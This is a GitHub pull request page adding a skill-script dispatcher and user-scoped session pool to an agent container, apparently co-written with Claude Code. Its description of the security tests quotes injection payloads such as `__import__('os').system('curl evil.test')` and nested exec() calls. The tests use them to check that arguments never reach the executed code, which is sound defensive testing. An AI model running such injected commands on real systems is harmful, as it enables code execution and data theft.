feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6) by ericodom · Pull Request #510 · thinkwork-ai/thinkwork

ericodom · 2026-04-24T11:22:41Z

Summary

Lands the single code path that every skill-with-scripts invocation will flow through once the Skill meta-tool (U5) wires it in. Today it ships as inert code — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow dispatch in U7 is the first consumer.

Part of the V1 agent-architecture plan (docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md §U4).

Why this is low-risk to land now

Dead code from production's perspective. server.py doesn't import skill_dispatcher; run_skill_dispatch.py still serves every live composition.
Every public entry point takes injected callables (pool's start_session/stop_session, dispatcher's runner). No boto3 in the hot path — AgentCore contact only happens when U7 wires the real runner.
All security invariants are structural, not runtime. SI-2 is "args never appear in exec string" — enforced by the fixed template. SI-3 is "user_id in pool key" — enforced by the pool class. SI-6 is "sys.modules purge before import" — part of the exec template. Breaking any would show up as a test failure before it showed up as a CVE.

The three security invariants

Invariant	How it's enforced
SI-2 Args are data, never code	`writeFiles([{path:"_args.json", text:json.dumps(args)}])` + fixed exec template that reads the file. Adversarial args (`__import__('os').system(...)`, nested `exec()`, unicode) round-trip unchanged through `_args.json` and never appear in the exec source. Regression test asserts exec string is byte-identical across two invocations with different args.
SI-3 User-scoped pool key	`SkillSessionPool` keys on `(tenant_id, user_id, environment)`. `test_si3_users_on_same_tenant_get_distinct_sessions` proves alice and bob can't share a warm session. `flush_for_tenant` isolates across tenants.
SI-6 Module namespace reset	Exec template purges `sys.modules['scripts.<slug>.*']` + `importlib.invalidate_caches()` before `from scripts.<slug>.entrypoint import run`. A monkey-patch from call N cannot leak into call N+1 on the same pooled session.

Test counts

test_skill_session_pool.py — 9 cases (acquire/reuse, concurrency, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant, flush-all)
test_skill_dispatcher.py — 9 cases (happy path, unknown slug, non-JSON stdout, timeout, non-zero exit, depth-cap boundary, turn budget, audit hook)
test_skill_dispatcher_security.py — 6 cases, each named with its SI number so grep test_si surfaces coverage at review time
Full agent-container suite: 211 green (24 new + 187 existing)
sandbox-preflight.test.ts: 9 green

What this PR does NOT do

Does not wire dispatcher into server.py's Agent(tools=...) flow. That's U5.
Does not extract the quota/audit loop from server.py:682-755. Deferred to U7 where quota actually fires — extracting now would add a seam with no caller.
Does not touch the real AgentCore Code Interpreter. Real integration happens in U7's shadow-dispatch harness.

Wiring

_boot_assert.EXPECTED_CONTAINER_SOURCES grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed.
packages/api/src/lib/sandbox-preflight.ts gains an optional caller: 'execute_code' | 'skill_dispatch' field on input + result. Defaults to execute_code for backwards compat.

Test plan

Full agent-container pytest: 211 green
pnpm --filter @thinkwork/api typecheck green
pnpm --filter @thinkwork/api test on sandbox-preflight.test.ts — 9 green
ruff import-sort clean on new Python
prettier clean on touched TS
Reviewer spot-checks SI-2 assertion (fixed template) and SI-3 pool-key tuple shape

🤖 Generated with Claude Code

…SI-2/3/6) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

…SI-2/3/6) (#510) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

ericodom merged commit 0204976 into main Apr 24, 2026
4 checks passed

ericodom deleted the feat/v1-agent-arch-u4-dispatcher branch April 24, 2026 11:24

This was referenced Apr 24, 2026

feat(agentcore-strands): U5 Skill meta-tool + session allowlist (ships inert) #511

Merged

feat: U7 shadow dispatch + deterministic characterization harness #512

Merged

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6)#510

feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6)#510
ericodom merged 1 commit into
mainfrom
feat/v1-agent-arch-u4-dispatcher

ericodom commented Apr 24, 2026

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

ericodom commented Apr 24, 2026

Summary

Why this is low-risk to land now

The three security invariants

Test counts

What this PR does NOT do

Wiring

Test plan

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant